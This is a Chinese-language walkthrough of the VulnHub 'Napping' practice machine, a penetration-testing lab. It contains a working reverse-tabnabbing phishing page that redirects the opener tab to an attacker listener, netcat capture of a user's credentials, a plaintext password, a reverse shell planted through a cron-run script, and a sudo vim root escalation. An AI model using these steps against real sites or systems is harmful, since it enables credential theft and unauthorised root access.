靶机信息
下载地址:https://www.vulnhub.com/entry/napping-101,752/
网络连接:桥接
ps:这个靶机最好装到virtualbox上,装在vmware可能会出现扫描不到的情况,靶机安装在virtualbox,kali在vmware,都设置为桥接模式。
信息搜集
扫描网段存活主机信息
由于靶机安装在virtualbox上,扫描的时候也会有显示,靶机为192.168.1.104
nmap -sn 192.168.1.0/24
对目标做进一步的扫描
nmap -A 192.168.1.104
先查看80端口,发现是一个登录界面
先注册一个账号
注册完账号登录后发现可以提交链接
漏洞利用
提交完链接后点击here即可跳转到链接界面
查了下发现使用a标签和target=_blank可以构成Reverse Tabnabbing钓鱼
在kali的/var/www/html目录下放两个html文件,一个为站点首页(index.html),一个为钓鱼界面(test.html)
wget下载的首页文件为.php文件,需要重命名为.html文件
wget http://192.168.1.104/index.php
mv index.php index.html
vim test.html
<!DOCTYPE html>
<html>
<body>
<script>
if(window.opener) window.opener.parent.location.replace('http://192.168.1.100:666/index.html');
if(window.opener!= window) window.opener.parent.location.replace('http://192.168.1.100:666/index.html');
</script>
</body>
</html>
开启http服务,并在kali监听端口
监听的端口为钓鱼页面里链接的端口
python3 -m http.server 80
nc -lvp 666在输入链接处,提交创建的钓鱼页面
过个两三分钟后,返回了数据包
权限提升
在返回的信息中发现了账号密码,密码这里需要url解码一下daniel/C@ughtm3napping123,登录到daniel账号
br/>daniel/C@ughtm3napping123,登录到daniel账号
使用id命令查看daniel账户发现属于administrators组,查找属该组的文件
发现一个python脚本,这个脚本又打开了一个site_status.txt文件
每两分钟会执行一次
在tmp目录下写一个反向shell,在kali上监听端口
修改python脚本,加入shell脚本的路径,调用os执行
等两分钟脚本定时执行后,即可回连到adrian账户
sudo -l看一下,发现可以用root权限免密执行vim
进行vim提权
sudo vim -c ':!/bin/bash'获取到root权限,在root目录下获取到root.txt
